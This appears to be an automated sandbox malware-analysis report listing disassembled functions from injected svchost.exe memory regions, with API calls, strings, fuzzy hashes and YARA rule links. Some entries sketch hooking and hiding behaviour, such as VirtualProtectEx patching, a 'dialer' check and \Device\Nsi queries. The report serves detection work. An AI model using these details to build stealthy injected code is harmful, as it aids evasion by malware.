Instruction Fuzzy Hash: E471A23A2077C3C5EB689B3699483AAA791F745BC8F648027DF5D53F88DE35C6088740

Function 00000282B93424DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000282B93425C3
StrCpyW.SHLWAPI ref: 00000282B93425DA

Strings

\\.\pipe\, xrefs: 00000282B93425CE

Memory Dump Source

Source File: 00000022.00000002.2667466358.00000282B9340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B9340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b9340000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: 084b50d7acc127dacd0718ddc926566f1eccb5e28dcace3a3b94f472851aea59
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: A051FC3A207781C2E6749F3A959C36AA751F387789F0AC025CD8637B99EE79C4098B40

Function 00000282B8DA24DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000282B8DA25C3
StrCpyW.SHLWAPI ref: 00000282B8DA25DA

Strings

\\.\pipe\, xrefs: 00000282B8DA25CE

Memory Dump Source

Source File: 00000022.00000002.2666614413.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8da0000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: e720f1cb33624888a94301bf7ac796f46fffc4eb14c4587fd4534a26a2553660
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: F551B63A2077C3C1E624AA3A955C3AA6755F3857C8F288037CFAE03F99CE35C4098B40

Function 00000282B9350604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00000282B935071B
GetLastError.KERNEL32 ref: 00000282B935073D

Strings

U, xrefs: 00000282B93506C7

Memory Dump Source

Source File: 00000022.00000002.2667466358.00000282B9340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B9340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b9340000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: 6d469ae3ee2af9fd391dcc4ae32d8577e51e7e02fb768c1b85a767821b83fc24
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: E041A376316A80C2EB209F35E44839AA7A0F38D789F458025EE8E97799EF3DC545CB40

Function 00000282B8DB0604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00000282B8DB071B
GetLastError.KERNEL32 ref: 00000282B8DB073D

Strings

U, xrefs: 00000282B8DB06C7

Memory Dump Source

Source File: 00000022.00000002.2666614413.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8da0000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: ecdea362a7edbb2fa468bb476da62adf37608014618e8b0d68f5ec1e69811487
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: C341A476316A81C2EB20DF25E448799A7A0F7987D8F508426EE4D87B58DF38C545CB40

Function 00000282B934D6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000282B934D6F9
LCMapStringW.KERNEL32 ref: 00000282B934D781

Strings

LCMapStringEx, xrefs: 00000282B934D6DC, 00000282B934D6ED

Memory Dump Source

Source File: 00000022.00000002.2667466358.00000282B9340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B9340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b9340000_svchost.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: e98c470b34140bcfd199283b8375f957e7d15ac7fc417bdbddefd31da84ed094
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: 6A114D3A209B80C6D760CF26F44439AB7A0F7C9B84F548126EE9D93B1AEF38C454CB00

Function 00000282B8DAD6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000282B8DAD6F9
LCMapStringW.KERNEL32 ref: 00000282B8DAD781

Strings

LCMapStringEx, xrefs: 00000282B8DAD6DC, 00000282B8DAD6ED

Memory Dump Source

Source File: 00000022.00000002.2666614413.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8da0000_svchost.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: bd32bb7834e3b3b94439ddb41bcc5b90cf05b1ad82a0dc71d273be1168f43ba8
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: E111273A209BC1C6DB64CB26F44439AB7A5F7C8BC4F548126EA9D83B19DF38C4448B00

Function 00000282B93494A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 00000282B93494E8
RaiseException.KERNEL32 ref: 00000282B934952E

Strings

csm, xrefs: 00000282B934951B

Memory Dump Source

Source File: 00000022.00000002.2667466358.00000282B9340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B9340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b9340000_svchost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: 5e6c52294bfa0660bc0ecf1752e57021bca2d6d1a0f26e6a77183d1c654a5da1
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: 11113A3620AB80C2EB618B25E45435A77A0F788F99F198220DE8D17B69EF38C559CB00

Function 00000282B8DA94A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 00000282B8DA94E8
RaiseException.KERNEL32 ref: 00000282B8DA952E

Strings

csm, xrefs: 00000282B8DA951B

Memory Dump Source

Source File: 00000022.00000002.2666614413.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8da0000_svchost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: cb23b2a4419c5e77b83864c32067f4b1b1221dd41d43c0173a8d6f813d500669
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: 4E114F36216B8192EB648F25E44435977E0F788BD8F288225DF9D07B68DF39C555CB00

Function 00000282B934D65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000282B934D68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00000282B934D6A7

Strings

InitializeCriticalSectionEx, xrefs: 00000282B934D681

Memory Dump Source

Source File: 00000022.00000002.2667466358.00000282B9340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B9340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b9340000_svchost.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: ca83b6511e8f59ddaf44ab22b950bd548b60e67ab88032a0cf072957876bab8d
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: D9F0E239313B80C2F7099B61F40C3953360EB8CB8AF89C021E95927B16EE38C89CC710

Function 00000282B8DAD65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000282B8DAD68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00000282B8DAD6A7

Strings

InitializeCriticalSectionEx, xrefs: 00000282B8DAD681

Memory Dump Source

Source File: 00000022.00000002.2666614413.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8da0000_svchost.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: 2355fe9f0e0a8f56f51db64cb2b53bc6aaf62d16e85e6c7d22d911faafa48ce4
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: 8EF0E2393137C1C1EB049B62F4083992361AB88BD8F58C427AA5D03F14CE38C89CC700

Function 00000282B934D608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000282B934D631
TlsSetValue.KERNEL32 ref: 00000282B934D648

Strings

FlsSetValue, xrefs: 00000282B934D61E

Memory Dump Source

Source File: 00000022.00000002.2667466358.00000282B9340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B9340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b9340000_svchost.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: 6132ad26e3eb2ce2ac84a7c6b7447817c9fdc2fb6a08bc9c268fea5a0450e923
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: 4EE09279203640D2FB494B70F80D7A92362BB8CB8AF8DC022D9192A357EE3CC85DC710

Function 00000282B8DAD608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000282B8DAD631
TlsSetValue.KERNEL32 ref: 00000282B8DAD648

Strings

FlsSetValue, xrefs: 00000282B8DAD61E

Memory Dump Source

Source File: 00000022.00000002.2666614413.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8da0000_svchost.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: 11e5bf126d9c18bd50898d069f94d5534f737ed80d262331493571c03beb715a
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: 5FE06D792036C6D1EA088B71F9087992362AB887C8F5CC027EA2D06B55CE38C85DC700

Function 00000282B8D7CB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000282B8D7CBC5

Strings

November, xrefs: 00000282B8D7CBA8, 00000282B8D7CBB2
October, xrefs: 00000282B8D7CBBE

Memory Dump Source

Source File: 00000022.00000002.2666248495.00000282B8D70000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8D70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8d70000_svchost.jbxd

Similarity

API ID: try_get_function
String ID: November$October
API String ID: 2742660187-1636048786
Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction ID: 89ff28dc2b4b98e417d3ecdd8381207dad7cc83d8863da9ca9c7dad1fd623a31
Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction Fuzzy Hash: BFE0923D2035C3D2FA049B71F4483E82322EB84BCCF99D023A61D06A52DE38D98EC341

Function 00000282B9341D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000282B9341D9B
HeapAlloc.KERNEL32 ref: 00000282B9341DAA
GetProcessHeap.KERNEL32 ref: 00000282B9341E1E
HeapFree.KERNEL32 ref: 00000282B9341E2C

Memory Dump Source

Source File: 00000022.00000002.2667466358.00000282B9340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B9340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b9340000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: 0a8be566b49f8886d0eea8f0135cb20fb035bb1670989c62a265fb36e3c35005
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: 6821883A607F90C2DB519F79E40535AF3A0FB99B99F098120DE8C57B19FE78C5468700

Function 00000282B8DA1D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000282B8DA1D9B
HeapAlloc.KERNEL32 ref: 00000282B8DA1DAA
GetProcessHeap.KERNEL32 ref: 00000282B8DA1E1E
HeapFree.KERNEL32 ref: 00000282B8DA1E2C

Memory Dump Source

Source File: 00000022.00000002.2666614413.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8da0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: bb6608267425bce8cb5d73f90270fb4861947b133a6cc48c437cc1cfc8af9b01
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: DE21833A607BD5C2EF118F69A40836AB3A4FB84BD8F158116DF8D47F54EE78C55A8700

Function 00000282B9341274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000282B934127A
HeapAlloc.KERNEL32 ref: 00000282B9341289
GetProcessHeap.KERNEL32 ref: 00000282B93412A3
HeapAlloc.KERNEL32 ref: 00000282B93412B4

Memory Dump Source

Source File: 00000022.00000002.2667466358.00000282B9340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B9340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b9340000_svchost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: 879d7d378ee7d5ea37d6664692f773f553f7b81ccdc9305549208ef45b335ef6
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: 27E03975613600C7E704AB72D80834937E1EB8CB06F48C024C90947355EF7D8599C780

Analysis Process: svchost.exePID: 772, Parent PID: 2788COMMON

Execution Graph

Execution Coverage:	0.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	68
Total number of Limit Nodes:	2

Executed Functions

Function 0000022857343458 Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 000002285734347A
PathFindFileNameW.SHLWAPI ref: 0000022857343489

Part of subcall function 0000022857343930: StrCmpNIW.SHLWAPI ref: 0000022857343948

Part of subcall function 0000022857343878: GetModuleHandleW.KERNEL32 ref: 0000022857343886
Part of subcall function 0000022857343878: GetCurrentProcess.KERNEL32 ref: 00000228573438B4
Part of subcall function 0000022857343878: VirtualProtectEx.KERNEL32 ref: 00000228573438D6
Part of subcall function 0000022857343878: GetCurrentProcess.KERNEL32 ref: 00000228573438F4
Part of subcall function 0000022857343878: VirtualProtectEx.KERNEL32 ref: 0000022857343915

CreateThread.KERNEL32 ref: 00000228573434D7

Part of subcall function 0000022857341EB4: GetCurrentThread.KERNEL32 ref: 0000022857341EBF

Memory Dump Source

Source File: 00000023.00000002.2667336285.0000022857340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022857340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22857340000_svchost.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction ID: 63af960ccc643dceba7eeb1e7f2b33dd90092e2c82907372a16dc50fcfa7e7ce
Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction Fuzzy Hash: F1115E7869365172F7399BE1FC0E3E52392B754335FCEC0259A4697294EF39C0688210

Function 0000022857341C28 Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000022857341650: GetProcessHeap.KERNEL32 ref: 000002285734165B
Part of subcall function 0000022857341650: HeapAlloc.KERNEL32 ref: 000002285734166A
Part of subcall function 0000022857341650: RegOpenKeyExW.ADVAPI32 ref: 00000228573416DA
Part of subcall function 0000022857341650: RegOpenKeyExW.ADVAPI32 ref: 0000022857341707
Part of subcall function 0000022857341650: RegCloseKey.ADVAPI32 ref: 0000022857341721
Part of subcall function 0000022857341650: RegOpenKeyExW.ADVAPI32 ref: 0000022857341741
Part of subcall function 0000022857341650: RegCloseKey.ADVAPI32 ref: 000002285734175C
Part of subcall function 0000022857341650: RegOpenKeyExW.ADVAPI32 ref: 000002285734177C
Part of subcall function 0000022857341650: RegCloseKey.ADVAPI32 ref: 0000022857341797
Part of subcall function 0000022857341650: RegOpenKeyExW.ADVAPI32 ref: 00000228573417B7
Part of subcall function 0000022857341650: RegCloseKey.ADVAPI32 ref: 00000228573417D2
Part of subcall function 0000022857341650: RegOpenKeyExW.ADVAPI32 ref: 00000228573417F2

Sleep.KERNEL32 ref: 0000022857341C43
SleepEx.KERNELBASE ref: 0000022857341C49

Part of subcall function 0000022857341650: RegCloseKey.ADVAPI32 ref: 000002285734180D
Part of subcall function 0000022857341650: RegOpenKeyExW.ADVAPI32 ref: 000002285734182D
Part of subcall function 0000022857341650: RegCloseKey.ADVAPI32 ref: 0000022857341848
Part of subcall function 0000022857341650: RegOpenKeyExW.ADVAPI32 ref: 0000022857341868
Part of subcall function 0000022857341650: RegCloseKey.ADVAPI32 ref: 0000022857341883
Part of subcall function 0000022857341650: RegOpenKeyExW.ADVAPI32 ref: 00000228573418A3
Part of subcall function 0000022857341650: RegCloseKey.ADVAPI32 ref: 00000228573418BE
Part of subcall function 0000022857341650: RegCloseKey.ADVAPI32 ref: 00000228573418C8

Memory Dump Source

Source File: 00000023.00000002.2667336285.0000022857340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022857340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22857340000_svchost.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction ID: 170173b9761ba9c424416d8e3d8d93679921d3405a12d2b2fe99ed2563af3334
Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction Fuzzy Hash: B6312A6E2A2E05B1FF789FB6D54C3E91396A745BF5FCEC011CE0987695EE14C4708250

Function 0000022857343930 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpNIW.SHLWAPI ref: 0000022857343948

Strings

dialer, xrefs: 0000022857343941

Memory Dump Source

Source File: 00000023.00000002.2667336285.0000022857340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022857340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22857340000_svchost.jbxd

Similarity

API ID:
String ID: dialer
API String ID: 0-3528709123
Opcode ID: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
Instruction ID: 392e98958a6cbb9e20c446fadda8d23d97921bc61633e3b5aa7e4d198871d807
Opcode Fuzzy Hash: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
Instruction Fuzzy Hash: 8BD05E2539264AA6EBB89FE1988D3E02351AB04725FCDC0208A0102114EF18C9AD9A10

Function 0000022856DC2908 Relevance: 1.7, APIs: 1, Instructions: 186
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 0000022856DC2A31

Memory Dump Source

Source File: 00000023.00000002.2666251689.0000022856DC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022856DC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22856dc0000_svchost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: 5712e75e57222b30ea233687c0632232f4500cf89b8ddbe490691c9eb8d418a7
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: 6061353230226497FA78CF96D44476CBB92FB44BD4F858921DA1947788DF3AF862C700

Non-executed Functions

Function 0000022857342CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 0000022857342D80
lstrlenW.KERNEL32 ref: 0000022857342FBA

Part of subcall function 0000022857341A14: OpenProcess.KERNEL32 ref: 0000022857341A3A
Part of subcall function 0000022857341A14: K32GetModuleFileNameExW.KERNEL32 ref: 0000022857341A58
Part of subcall function 0000022857341A14: PathFindFileNameW.SHLWAPI ref: 0000022857341A67
Part of subcall function 0000022857341A14: lstrlenW.KERNEL32 ref: 0000022857341A73
Part of subcall function 0000022857341A14: StrCpyW.SHLWAPI ref: 0000022857341A86
Part of subcall function 0000022857341A14: CloseHandle.KERNEL32 ref: 0000022857341A94

GetProcAddress.KERNEL32 ref: 0000022857342D95

Part of subcall function 0000022857341554: StrCmpIW.SHLWAPI ref: 0000022857341585

Part of subcall function 0000022857343930: StrCmpNIW.SHLWAPI ref: 0000022857343948

StrCmpNIW.SHLWAPI ref: 0000022857342DD8
lstrlenW.KERNEL32 ref: 0000022857342F00

Strings

NtQueryObject, xrefs: 0000022857342D8B
ntdll.dll, xrefs: 0000022857342D79
\Device\Nsi, xrefs: 0000022857342DCB

Memory Dump Source

Source File: 00000023.00000002.2667336285.0000022857340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022857340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22857340000_svchost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: 61125b0f779e52217195bb280178ebf848875f7feac1ddbd6545f7e150fc7f1d
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: 77B1E736252690A1EB7C8FA5C44CBD963E6F744BA4FCA9016EE0963794DF35CCA0C740

Function 0000022857347E70 Relevance: 10.6, APIs: 7, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 0000022857347E8C
RtlCaptureContext.NTDLL ref: 0000022857347EB9
RtlLookupFunctionEntry.NTDLL ref: 0000022857347ED3
RtlVirtualUnwind.NTDLL ref: 0000022857347F14
IsDebuggerPresent.KERNEL32 ref: 0000022857347F68
SetUnhandledExceptionFilter.KERNEL32 ref: 0000022857347F89
UnhandledExceptionFilter.KERNEL32 ref: 0000022857347F94

Memory Dump Source

Source File: 00000023.00000002.2667336285.0000022857340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022857340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22857340000_svchost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: d5d0770a036a21eeb7298b4afa1944cd1e4a755ce1beab8c20e9612802c65c50
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: 2D31A476246BC0A9EB749FA0E8483DD7361F784758FC9842ADA4D47B98EF38C558C700

Function 000002285734B50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000002285734B585
RtlLookupFunctionEntry.NTDLL ref: 000002285734B59D
RtlVirtualUnwind.NTDLL ref: 000002285734B5D8
IsDebuggerPresent.KERNEL32 ref: 000002285734B611
SetUnhandledExceptionFilter.KERNEL32 ref: 000002285734B61B
UnhandledExceptionFilter.KERNEL32 ref: 000002285734B626

Memory Dump Source

Source File: 00000023.00000002.2667336285.0000022857340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022857340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22857340000_svchost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: 4d3c9b91f246e3acbce4f539fef4064cd0ba86ffa97e3c290d1d78485406110e
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: A5318C36245F80A6DB74CF64E8483DE73A1F788768FD94116EA9D43BA4DF38C5658B00

Function 000002285734FEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000002285734FF67
WriteFile.KERNEL32 ref: 000002285735021E
WriteFile.KERNEL32 ref: 0000022857350270
GetLastError.KERNEL32 ref: 0000022857350372
GetLastError.KERNEL32 ref: 00000228573503D2

Memory Dump Source

Source File: 00000023.00000002.2667336285.0000022857340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022857340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22857340000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
